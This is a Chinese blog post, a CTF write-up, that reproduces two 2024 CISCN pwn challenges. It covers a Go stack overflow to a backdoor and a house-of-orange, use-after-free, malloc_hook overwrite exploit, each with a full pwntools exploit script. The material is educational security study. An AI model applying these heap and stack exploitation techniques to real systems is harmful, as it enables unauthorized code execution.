
  <!DOCTYPE html>
  <html lang="zh-CN"  data-theme="dark" >
  <head>
  <meta charset="utf-8">
  

  

  

  
  <script>window.icon_font = '4552607_tq6stt6tcg';window.clipboard_tips = {"success":"复制成功(*^▽^*)","fail":"复制失败 (ﾟ⊿ﾟ)ﾂ","copyright":{"enable":false,"count":50,"content":"本文版权：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！"}};</script>
  
  
  <title>
    2024ciscn pwn 复现 |
    
    T3uk1 の 庭院
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CUbuntu%20Mono:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CUbuntu%20Mono:400,400italic,700,700italic&display=swap" media="print" onload="this.media&#x3D;&#39;all&#39;">
  
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_tq6stt6tcg.woff2" as="font" type="font/woff2" crossorigin="anonymous">
  
  
<link rel="stylesheet" href="/css/loader.css">

  <meta name="description" content="2024ciscn pwn 复现   gostack go语言程序的栈溢出。（go的反汇编真难读啊（恼）） 为了提高可读性先使用go_parser恢复文件的符号表  go_parser下载： 1git clone git@github.com:0xjiayu&#x2F;go_parser.git 使用方法：将go_parser克隆下来后，打开IDA→左上角File→Script File→找到go_par">
<meta property="og:type" content="article">
<meta property="og:title" content="2024ciscn pwn 复现">
<meta property="og:url" content="https://t3uk1.github.io/2024/05/23/2024ciscn-pwn-%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="T3uk1 の 庭院">
<meta property="og:description" content="2024ciscn pwn 复现   gostack go语言程序的栈溢出。（go的反汇编真难读啊（恼）） 为了提高可读性先使用go_parser恢复文件的符号表  go_parser下载： 1git clone git@github.com:0xjiayu&#x2F;go_parser.git 使用方法：将go_parser克隆下来后，打开IDA→左上角File→Script File→找到go_par">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://t3uk1.github.io/2024/05/23/2024ciscn-pwn-%E5%A4%8D%E7%8E%B0/image-20240526160103971.png">
<meta property="og:image" content="https://t3uk1.github.io/2024/05/23/2024ciscn-pwn-%E5%A4%8D%E7%8E%B0/image-20240526160235817.png">
<meta property="og:image" content="https://t3uk1.github.io/2024/05/23/2024ciscn-pwn-%E5%A4%8D%E7%8E%B0/image-20240526162531351.png">
<meta property="og:image" content="https://t3uk1.github.io/2024/05/23/2024ciscn-pwn-%E5%A4%8D%E7%8E%B0/image-20240811132940544.png">
<meta property="og:image" content="https://t3uk1.github.io/2024/05/23/2024ciscn-pwn-%E5%A4%8D%E7%8E%B0/image-20240811153503806.png">
<meta property="og:image" content="https://t3uk1.github.io/2024/05/23/2024ciscn-pwn-%E5%A4%8D%E7%8E%B0/image-20240811153842551.png">
<meta property="og:image" content="https://t3uk1.github.io/2024/05/23/2024ciscn-pwn-%E5%A4%8D%E7%8E%B0/image-20240811154106966.png">
<meta property="og:image" content="https://t3uk1.github.io/2024/05/23/2024ciscn-pwn-%E5%A4%8D%E7%8E%B0/image-20240811154853874.png">
<meta property="og:image" content="https://t3uk1.github.io/2024/05/23/2024ciscn-pwn-%E5%A4%8D%E7%8E%B0/image-20240811155120097.png">
<meta property="og:image" content="https://t3uk1.github.io/2024/05/23/2024ciscn-pwn-%E5%A4%8D%E7%8E%B0/image-20240811155604535.png">
<meta property="article:published_time" content="2024-05-23T10:41:01.000Z">
<meta property="article:modified_time" content="2024-08-19T10:46:15.415Z">
<meta property="article:author" content="*月遇丛雲花遇風*">
<meta property="article:tag" content="pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://t3uk1.github.io/2024/05/23/2024ciscn-pwn-%E5%A4%8D%E7%8E%B0/image-20240526160103971.png">
  
    <link rel="alternate" href="/atom.xml" title="T3uk1 の 庭院" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/images/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  
<link rel="stylesheet" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css">

  
  
  
  
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js"></script>

  
    
<link rel="stylesheet" href="https://npm.webcache.cn/wowjs@1.1.3/css/libs/animate.css">

    
<script src="https://npm.webcache.cn/wowjs@1.1.3/dist/wow.min.js"></script>

    <script>
      new WOW({
        offset: 0,
        mobile: true,
        live: false
      }).init();
    </script>
  
<meta name="generator" content="Hexo 7.3.0"></head>

  <body>
    
  <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi">
        <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
          <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="#ff6e6b" />
          <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z" fill="#fd0d00" />
          <path d="M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95" fill="#fd0d00" />
        </svg>
      </div>
      <div class="loading-word">少女祈祷中...</div>
    </div>
  </div>
  </div>
  <script>
    var time = null;
    var startLoading = () => {
      time = Date.now();
      document.getElementById('loader').classList.remove("loading");
    }
    var endLoading = () => {
      if (!time) {
        document.body.style.overflow = 'auto';
        document.getElementById('loader').classList.add("loading");
      } else {
        if (Date.now() - time > 500) {
          time = null;
          document.body.style.overflow = 'auto';
          document.getElementById('loader').classList.add("loading");
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    document.getElementById('loader').addEventListener('click', endLoading);
  </script>

<div id="copy-tooltip" style="pointer-events: none; opacity: 0; transition: all 0.2s ease; position: fixed;top: 50%;left: 50%;z-index: 999;transform: translate(-50%, -50%);color: white;background: rgba(0, 0, 0, 0.5);padding: 10px 15px;border-radius: 10px;">
</div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav">
    
      <span class="main-nav-link-wrap">
        <span class="main-nav-icon"></span>
        <a class="main-nav-link" href="/">首页</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <span class="main-nav-icon"></span>
        <a class="main-nav-link" href="/archives">归档</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <span class="main-nav-icon"></span>
        <a class="main-nav-link" href="/about">关于</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <span class="main-nav-icon"></span>
        <a class="main-nav-link" href="/friend">友链</a>
      </span>
    
    <a id="main-nav-toggle" class="nav-icon"></a>
  </nav>
  <nav id="sub-nav">
    
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS 订阅"></a>
    
    
    
      <a id="nav-search-btn" class="nav-icon popup-trigger" title="搜索"></a>
    
  </nav>
</div>
<header id="header">
  
    
      <img fetchpriority="high" src="/images/banner.jpg" alt="2024ciscn pwn 复现">
    
  
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <div id="logo-wrap">
        
          
          
            <a href="/" id="logo">
              <h1>2024ciscn pwn 复现</h1>
            </a>
          
        
      </div>
      
        
        <h2 id="subtitle-wrap">
          
        </h2>
      
    </div>
  </div>
</header>

        <div id="content" class="outer">
          
          <section id="main"><article id="post-2024ciscn-pwn-复现" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner">
    <div class="article-meta">
      <div class="article-date wow slideInLeft">
  <a href="/2024/05/23/2024ciscn-pwn-%E5%A4%8D%E7%8E%B0/" class="article-date-link">
    <time datetime="2024-05-23T10:41:01.000Z" itemprop="datePublished">2024-05-23</time>
    <time style="display: none;" id="post-update-time">2024-08-19</time>
  </a>
</div>

      
  <div class="article-category wow slideInLeft">
    <a class="article-category-link" href="/categories/CTF/">CTF</a><a class="article-category-link" href="/categories/CTF/pwn/">pwn</a>
  </div>


    </div>
    <div class="hr-line"></div>
    

    <div class="e-content article-entry" itemprop="articleBody">
      
      
        <h1 id="2024ciscn-pwn-复现"><a class="markdownIt-Anchor" href="#2024ciscn-pwn-复现"></a> 2024ciscn pwn 复现</h1>
<!-- toc -->
<h2 id="gostack"><a class="markdownIt-Anchor" href="#gostack"></a> gostack</h2>
<p>go语言程序的栈溢出。（go的反汇编真难读啊（恼））</p>
<p>为了提高可读性先使用go_parser恢复文件的符号表</p>
<blockquote>
<p>go_parser下载：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git clone git@github.com:0xjiayu/go_parser.git</span><br></pre></td></tr></table></figure>
<p>使用方法：将go_parser克隆下来后，打开IDA→左上角File→Script File→找到go_parser目录，选择go_parser.py，确认后就能自动恢复符号表了，如果中途出错了那就是其他问题了（</p>
</blockquote>
<img src="image-20240526160103971.png" alt="image-20240526160103971" style="zoom:67%;">
<p>可以看到恢复符号表后的函数列表中出现了大量go的库函数，我们直接找主函数main_main</p>
<img src="image-20240526160235817.png" alt="image-20240526160235817" style="zoom:50%;">
<p>在main_main_func3中发现了输入提示：</p>
<img src="image-20240526162531351.png" alt="image-20240526162531351" style="zoom:50%;">
<p>后面发现fun2其实是后门，下班（x</p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#p = process(&#x27;./gostack&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;?????&#x27;</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./gostack&#x27;</span>)</span><br><span class="line"></span><br><span class="line">backdoor = <span class="number">0x4A05A0</span></span><br><span class="line">ret = <span class="number">0x4A0A9E</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">p.recvuntil(<span class="string">&#x27;Input your magic message :&#x27;</span>)</span><br><span class="line">payload = <span class="string">b&#x27;\x00&#x27;</span> * <span class="number">0x1d0</span> + p64(backdoor)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p>不用后门的话还可以ret2syscall，相关的gadgets都能找到</p>
<h2 id="orange_cat_diary"><a class="markdownIt-Anchor" href="#orange_cat_diary"></a> orange_cat_diary</h2>
<p>这道其实是原题（</p>
<p>原题是巅峰极客的snote</p>
<p>分析文件：</p>
<p>在delete操作这里free指针后没有置空，且只有一次delete机会，所以只有一次UAF：</p>
<p><img src="image-20240811132940544.png" alt="image-20240811132940544"></p>
<p>同时也只有一次show的机会：</p>
<p><img src="image-20240811153503806.png" alt="image-20240811153503806"></p>
<p>题目提示了orange，则从house of orange入手。</p>
<p>House of Orange 的核心在于在没有 free 函数的情况下得到一个释放的堆块 (unsorted bin)。 这种操作的原理简单来说是当前堆的 top chunk 尺寸不足以满足申请分配的大小的时候，原来的 top chunk 会被释放并被置入 unsorted bin 中，通过这一点可以在没有 free 函数情况下获取到 unsorted bins。</p>
<p><img src="image-20240811153842551.png" alt="image-20240811153842551"></p>
<p>topchunk的大小为0x20f91，首先修改top_chunk的size：</p>
<p>利用堆溢出覆盖top_chunk的size字段，先申请一次堆块，然后编辑这个堆块大小+8的内容，额外的内容用0xf91覆盖。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0x68</span>, <span class="string">b&#x27;aaaa&#x27;</span>)</span><br><span class="line">edit(<span class="number">0x70</span>, <span class="string">b&#x27;a&#x27;</span> * <span class="number">0x68</span> + p64(<span class="number">0xf91</span>))</span><br></pre></td></tr></table></figure>
<p>这样就把top_chunk的size修改为了0xf91</p>
<p><img src="image-20240811154106966.png" alt="image-20240811154106966"></p>
<p>然后申请一个大于0xf91的块，将top_chunk放入unsorted_bin中</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0x1000</span>, <span class="string">b&quot;bbbb&quot;</span>)</span><br></pre></td></tr></table></figure>
<p>接着再申请一个chunk，这个chunk包含了main_arena+1640的信息，在debug中使用telescope查看刚刚申请的堆块可以看到这个堆块中的信息可以泄露main_arena的地址。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0x18</span>, <span class="string">b&#x27;cccccccc&#x27;</span>)</span><br></pre></td></tr></table></figure>
<p><img src="image-20240811154853874.png" alt="image-20240811154853874"></p>
<p>因此利用仅有一次的show就能够泄露main_arena的地址，得到这个根据libc中main_arena的偏移就能得到libc基地址，从而得到malloc_hook的地址。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">show()</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;cccccccc&#x27;</span>)</span><br><span class="line">main_arena = u64(p.recvuntil(<span class="string">&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">libc_base = main_arena - <span class="number">0x3c4b20</span> - <span class="number">1640</span></span><br></pre></td></tr></table></figure>
<p><img src="image-20240811155120097.png" alt="image-20240811155120097"></p>
<p>接下来就能利用UAF打malloc_hook了。</p>
<p>要注意的是这里要打的是malloc_hook - 0x23</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0x68</span>, <span class="string">b&#x27;dddd&#x27;</span>)</span><br><span class="line">delete()</span><br><span class="line">malloc_hook = libc.sym[<span class="string">&#x27;__malloc_hook&#x27;</span>]</span><br><span class="line">edit(<span class="number">0x10</span>, p64(libc_base + malloc_hook - <span class="number">0x23</span>))</span><br><span class="line"></span><br><span class="line">one_gadget = libc_base + <span class="number">0xf03a4</span> </span><br><span class="line">add(<span class="number">0x68</span>, <span class="string">b&#x27;a&#x27;</span>)</span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span> * <span class="number">0x13</span> + p64(one_gadget)</span><br><span class="line">add(<span class="number">0x68</span>, payload)</span><br></pre></td></tr></table></figure>
<p>然后再次调用malloc的时候就会触发onegadget：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">p.recvuntil(<span class="string">b&#x27;Please input your choice:&#x27;</span>)</span><br><span class="line">p.sendline(<span class="built_in">str</span>(<span class="number">1</span>))</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;the length of the diary content:&#x27;</span>)</span><br><span class="line">p.sendline(<span class="built_in">str</span>(<span class="number">114</span>))</span><br></pre></td></tr></table></figure>
<p><img src="image-20240811155604535.png" alt="image-20240811155604535"></p>
<p>远程也是打得通的，完整exp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># local 0   remote 1</span></span><br><span class="line">mode = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> mode == <span class="number">0</span>:</span><br><span class="line">    p = process(<span class="string">&#x27;./orange_cat_diary&#x27;</span>)</span><br><span class="line"><span class="keyword">elif</span> mode == <span class="number">1</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;pwn.challenge.ctf.show&#x27;</span>, <span class="number">28205</span>)</span><br><span class="line">    </span><br><span class="line">elf = ELF(<span class="string">&#x27;./orange_cat_diary&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc.so.6&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">size, content</span>):</span><br><span class="line">    p.recvuntil(<span class="string">b&#x27;Please input your choice:&#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(<span class="number">1</span>))</span><br><span class="line">    p.recvuntil(<span class="string">b&#x27;the length of the diary content:&#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(size))</span><br><span class="line">    p.recvuntil(<span class="string">b&#x27;Please enter the diary content:&#x27;</span>)</span><br><span class="line">    p.send(content)</span><br><span class="line">    </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>():</span><br><span class="line">    p.recvuntil(<span class="string">b&#x27;Please input your choice:&#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(<span class="number">2</span>))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>():</span><br><span class="line">    p.recvuntil(<span class="string">b&#x27;Please input your choice:&#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(<span class="number">3</span>))</span><br><span class="line">    </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">size, content</span>):</span><br><span class="line">    p.recvuntil(<span class="string">b&#x27;Please input your choice:&#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(<span class="number">4</span>))</span><br><span class="line">    p.recvuntil(<span class="string">b&#x27;the length of the diary content:&#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(size))</span><br><span class="line">    p.recvuntil(<span class="string">b&#x27;Please enter the diary content:&#x27;</span>)</span><br><span class="line">    p.send(content)</span><br><span class="line">    </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">debug</span>():</span><br><span class="line">    debug_addr=<span class="number">0x0EDA</span></span><br><span class="line">    gdb.attach(p, <span class="string">&#x27;b *$rebase(&#123;&#125;)&#x27;</span>.<span class="built_in">format</span>(debug_addr))</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&quot;Hello, I&#x27;m delighted to meet you. Please tell me your name.&quot;</span>)</span><br><span class="line">p.send(<span class="string">b&#x27;fuckyou&#x27;</span>)</span><br><span class="line">add(<span class="number">0x68</span>, <span class="string">b&#x27;aaaa&#x27;</span>)</span><br><span class="line">edit(<span class="number">0x70</span>, <span class="string">b&#x27;a&#x27;</span> * <span class="number">0x68</span> + p64(<span class="number">0xf91</span>))</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x1000</span>, <span class="string">b&quot;bbbb&quot;</span>)</span><br><span class="line">add(<span class="number">0x18</span>, <span class="string">b&#x27;cccccccc&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># leak main_arena, libc_base, heap_base</span></span><br><span class="line">show()</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;cccccccc&#x27;</span>)</span><br><span class="line">main_arena = u64(p.recvuntil(<span class="string">&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;[+] main_arena_off: &#x27;</span>, <span class="built_in">hex</span>(libc.sym[<span class="string">&#x27;main_arena&#x27;</span>]))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;[+] main_arena_addr: &#x27;</span>, <span class="built_in">hex</span>(main_arena))</span><br><span class="line"><span class="comment"># 0x3c4b20 + 1640</span></span><br><span class="line">libc_base = main_arena - <span class="number">0x3c4b20</span> - <span class="number">1640</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;[+] libc_base: &#x27;</span>, <span class="built_in">hex</span>(libc_base))</span><br><span class="line"><span class="comment"># 泄露堆地址，不过这题实际上并不需要泄露堆地址就能做</span></span><br><span class="line">p.recv(<span class="number">3</span>)</span><br><span class="line">heap = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">heap_addr = heap &lt;&lt; <span class="number">8</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;[+] heap_addr: &#x27;</span>, <span class="built_in">hex</span>(heap_addr))</span><br><span class="line"><span class="comment">#debug()</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># UAF</span></span><br><span class="line">add(<span class="number">0x68</span>, <span class="string">b&#x27;dddd&#x27;</span>)</span><br><span class="line">delete()</span><br><span class="line">malloc_hook = libc.sym[<span class="string">&#x27;__malloc_hook&#x27;</span>]</span><br><span class="line"><span class="comment"># libc 2.23 need malloc_hook - 0x23</span></span><br><span class="line">edit(<span class="number">0x10</span>, p64(libc_base + malloc_hook - <span class="number">0x23</span>))</span><br><span class="line"></span><br><span class="line">one_gadget = libc_base + <span class="number">0xf03a4</span> </span><br><span class="line">add(<span class="number">0x68</span>, <span class="string">b&#x27;a&#x27;</span>)</span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span> * <span class="number">0x13</span> + p64(one_gadget)</span><br><span class="line">add(<span class="number">0x68</span>, payload)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">b&#x27;Please input your choice:&#x27;</span>)</span><br><span class="line">p.sendline(<span class="built_in">str</span>(<span class="number">1</span>))</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;the length of the diary content:&#x27;</span>)</span><br><span class="line">p.sendline(<span class="built_in">str</span>(<span class="number">114</span>))</span><br><span class="line">p.interactive()</span><br><span class="line">    </span><br></pre></td></tr></table></figure>

      
    </div>
    <footer class="article-footer">
      <blockquote class="article-copyright">
    <p><strong>本文作者：</strong>*月遇丛雲花遇風* @ T3uk1 の 庭院</p>
    <p><strong>本文链接：</strong><a href="https://t3uk1.github.io/2024/05/23/2024ciscn-pwn-%E5%A4%8D%E7%8E%B0/">https://t3uk1.github.io/2024/05/23/2024ciscn-pwn-%E5%A4%8D%E7%8E%B0/</a></p>
    <p><strong>本文标题：</strong>2024ciscn pwn 复现</p>
    
    
    <p><strong>本文版权：</strong>本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh"><span class="icon-creative-commons"></span>BY-NC-SA</a> 许可协议。转载请注明出处！</p>
  </blockquote>
      
      
      
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li></ul>


    </footer>
  </div>
  
    
  <nav id="article-nav" class="wow fadeInUp">
    
      <div class="article-nav-link-wrap article-nav-link-left">
        
          
          
            <img data-src="/covers/wallhaven-6opjyx.png" data-sizes="auto" alt="（CVE-2017-17215）华为HG532路由器漏洞复现" class="lazyload">
          
        
        <a href="/2024/07/20/%EF%BC%88CVE-2017-17215%EF%BC%89%E5%8D%8E%E4%B8%BAHG532%E8%B7%AF%E7%94%B1%E5%99%A8%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/"></a>
        <div class="article-nav-caption">前一篇</div>
        <h3 class="article-nav-title">
          
            （CVE-2017-17215）华为HG532路由器漏洞复现
          
        </h3>
      </div>
    
    
    <div class="article-nav-link-wrap article-nav-link-right">
      
        
        
          <img data-src="/covers/QQ图片20220222181627.jpg" data-sizes="auto" alt="2024省赛初赛Pwn WP" class="lazyload">
        
      
      <a href="/2024/05/12/2024%E7%9C%81%E8%B5%9B%E5%88%9D%E8%B5%9BPwn-WP/"></a>
      <div class="article-nav-caption">后一篇</div>
      <h3 class="article-nav-title">
        
          2024省赛初赛Pwn WP
        
      </h3>
    </div>
    
  </nav>


  
</article>






</section>
          
            <aside id="sidebar">
  <div class="sidebar-wrap wow fadeInRight wrap-sticky">
    
      <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#2024ciscn-pwn-%E5%A4%8D%E7%8E%B0"><span class="toc-number">1.</span> <span class="toc-text"> 2024ciscn pwn 复现</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#gostack"><span class="toc-number">1.1.</span> <span class="toc-text"> gostack</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#orange_cat_diary"><span class="toc-number">1.2.</span> <span class="toc-text"> orange_cat_diary</span></a></li></ol></li></ol>
      
  </div>
</div>
</div>
      <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.jpg" data-sizes="auto" alt="*月遇丛雲花遇風*" class="lazyload">
  <div class="sidebar-author-name">*月遇丛雲花遇風*</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">26</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">16</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">26</div>
  </div>
</div>
<div class="sidebar-social">
  
    <div class="icon-email sidebar-social-icon">
      <a href=1027600674@qq.com itemprop="url" target="_blank" aria-label="email"></a>
    </div>
  
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/t3uk1 itemprop="url" target="_blank" aria-label="github"></a>
    </div>
  
</div>
<div class="sidebar-menu">
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
      <span class="sidebar-menu-icon"></span>
      <div class="sidebar-menu-link">首页</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
      <span class="sidebar-menu-icon"></span>
      <div class="sidebar-menu-link">归档</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
      <span class="sidebar-menu-icon"></span>
      <div class="sidebar-menu-link">关于</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
      <span class="sidebar-menu-icon"></span>
      <div class="sidebar-menu-link">友链</div>
    </div>
  
</div>
</div>
    
    
      <div class="sidebar-btn-wrapper" style="position:static">
        <div class="sidebar-toc-btn current"></div>
        <div class="sidebar-common-btn"></div>
      </div>
    
  </div>

  
</aside>

          
        </div>
        <footer id="footer" class="wow fadeInUp">
